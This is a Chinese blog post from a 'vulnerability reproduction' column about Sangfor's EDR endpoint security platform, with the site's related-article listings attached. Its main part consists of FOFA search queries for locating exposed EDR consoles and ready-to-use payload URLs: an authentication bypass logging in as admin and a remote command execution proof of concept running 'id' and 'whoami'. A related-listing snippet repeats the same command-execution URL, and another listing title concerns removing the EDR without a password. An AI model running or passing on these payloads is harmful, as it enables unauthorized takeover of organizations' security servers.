深信服EDR

最新推荐文章于 2025-01-18 21:28:53 发布

原创最新推荐文章于 2025-01-18 21:28:53 发布 · 1.7k 阅读

2 ·

CC 4.0 BY-SA版权

漏洞复现专栏收录该内容

21 篇文章

订阅专栏

本文揭露深信服EDR系统中存在任意用户登录漏洞，通过fofa语法发现的两个payload示例，展示了如何利用该漏洞进行攻击。攻击者可利用`https://1.1.1.1/ui/login.php?user=admin`和`https://x.x.x.x/tool/log/c.php`进行登录，提示安全防护措施的紧急性。

深信服EDR 任意用户登录

fofa语法：

body="终端检测响应平台"
title="终端检测响应平台"
title="SANGFOR终端检测响应平台"

在这里插入图片描述
payload:

https://1.1.1.1/ui/login.php?user=admin

在这里插入图片描述

EDR RCE

poc

https://x.x.x.x/tool/log/c.php?strip_slashes=system&host=id

在这里插入图片描述

https://x.x.x.x/tool/log/c.php?strip_slashes=system&host=whoami

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Min1996

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

深信服EDR终端响应平台

m0_51186260的博客

06-14

1万+

深信服EDR检测响应平台

深信服EDR恶意样本实验

最新发布

Jinmuyan_的博客

01-18

1005

Windows 快速查杀目录包括/windows和/windows/system32本级目录，/windows/system32/drivers目录和其子目录。近年来病毒数量呈指数级增长，恶意文件层出不穷，给企业级用户造成了很大的安全威胁。针对这类恶意文件、恶意病毒，通过文件信誉检测引擎、基因特征检测引擎、打开[威胁检测/终端病毒查杀]，点击或者，配置终端所在分组的实时防护策略，按如下图配置，关闭文件实时监控。配置终端所在分组的实时防护策略，按如下图配置，关闭文件实时监控。

参与评论您还未登录，请先登录后发表或查看评论

深信服勒索病毒专杀工具EDR.zip

10-12

一直在更新维护的勒索病毒专杀工具,比其他加的好用多了. 病毒库还有更新的

深信服EDR解决方案-V2.pptx

08-25

深信服EDR解决方案-V2

深信服EDR任意用户登录与命令执行漏洞

剁椒鱼头没剁椒的博客

01-18

5737

终端检测响应平台（EDR）是深信服公司提供的一套终端安全解决方案，方案由轻量级的端点安全软件（Agent）和管理平台（MGR）共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查，支持微隔离的访问控制策略统一管理，支持对安全事件的一键隔离处置，以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。

深信服 EDR终端检测响应平台 0day RCE 漏洞

Adminxe的博客

08-18

7108

0x01 前言昨天睡得正香，突然公司售前就呼来电话，问某某edr出现啥问题了，然后我就给他讲了一遍，这个月太忙了，没时间写博客，今天继续来水一篇。其次大哥来波最真挚的简介： 深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统...

深信服EDR主打PPT（商业版）.pptx

09-16

深信服EDR作为一款先进的终端安全解决方案，旨在应对日益复杂的威胁环境，通过以AI为核心的技术，重构下一代终端安全，实现从传统的防病毒策略向更智能、更全面的终端威胁检测与响应（EDR）转变。终端安全的发展...

深信服edr终端检测响应平台（_3.2.21）代码审计挖掘（权限绕过）1

08-03

深信服EDR终端检测响应平台代码审计挖掘（权限绕过）本文将对深信服EDR终端检测响应平台（）代码审计挖掘进行分析，本平台使用C#语言编写，具有代码审计挖掘功能。本文将对平台的代码结构、权限绕过漏洞等进行详细...

深信服edr终端检测响应平台（_3.2.21）代码审计挖掘（RCE）1

08-03

【深信服edr终端检测响应平台（3.2.21）代码审计挖掘（RCE）1】涉及的知识点： 1. **代码审计**：代码审计是安全专家通过检查软件源代码或二进制代码，查找潜在的安全漏洞和错误的过程。在本案例中，审计的目标是...

深信服EDR勒索病毒查杀实验

Jinmuyan_的博客

01-18

948

若学员在电脑本机搭建实验环境，注意做好实验环境的脱机，只放通到MGR的通信，避免勒索病毒在内网横向传播的风险。5.测试机双机打开EDR终端防护中心后运行病毒样本文件，后观察测试电脑右下角，EDR发现勒索病毒并弹出告警处理提示框（注意，管理员和终端不能开启免打扰模式）因为勒索病毒防护功能，依赖文件实时监控，所以要开启文件实时监控。场景下勒索病毒防护的配置，勒索病毒检测，查杀判断并进行处置，保障病毒查杀处置有效。，如下图配置，开启“勒索病毒诱饵防护”和“文件实时监控”配置测试机所在分组的“勒索病毒防护策略”。

安全之巅：八款主流杀毒软件横向评测

01-18

对于网上八款主流杀毒软件(瑞星杀毒软件2008、金山毒霸2008、McAfee Internet Security Suite 2008、趋势科技网络安全专家2008、卡巴斯基互联网安全套装7.0单机版、诺顿网络安全特警 2008、江民 KV2008、ESET NOD32)的对比评价。

如何管理员工上网怎样控制员工上网行为？

02-19

如何最有效监控员工上网行为，控制员工工作时间的上网行为，本文提供了一种非常便捷和有效的方法，可以让你轻松掌控员工工作时间的上网行为，更好地使用公司电脑为公司工作，而不是上网娱乐。

深信服edr终端漏洞

qq_40806924的博客

08-20

4734

一、前言最近这些天来了广州当蓝方，工作之余听到了几个朋友说关于深信服edr爆0day的情况，自己也没时间复现，就简单记录一下。该XXX简介： 深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页

深信服EDR安装部署实验

Jinmuyan_的博客

01-18

2397

edr_install_EDR控制台IP地址_4430，4430为默认端口。找到终端防护中心密码保护设置，并取消勾选单位为确保内网终端安全、防止被恶意入侵，需在内网终端安装。客户端安装，并且在管理平台能看到终端上线。安装完成后，点击开始防护，代表已完成客户端。弹出无法验证远程计算机身份，点击“是”。登录EDR服务端控制台，点击终端管理。勾选同意免责声明，点击开始安装。下载完成后，自动进入安装阶段。“终端管理”看到该终端上线。->策略中心->基本策略。->终端部署->通用部署。

深信服EDR（终端检测响应平台）远程命令执行

Websec

08-18

4588

深信服edr远程命令执行复现 1、POC http:xxxxxx/tool/log/c.php?strip_slashes=system&host=id 2、FOFA语法语法 title="终端检测响应平台" https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0 3、案例复现漏洞页面: ...

深信服终端安全管理系统EDR版本升级过程

m0_64423407的博客

06-19

3293

深信服终端安全管理系统EDR版本升级统一端点安全管理系统aES

无需密码卸载深信服EDR,并无需密码重新安装深信服EDR。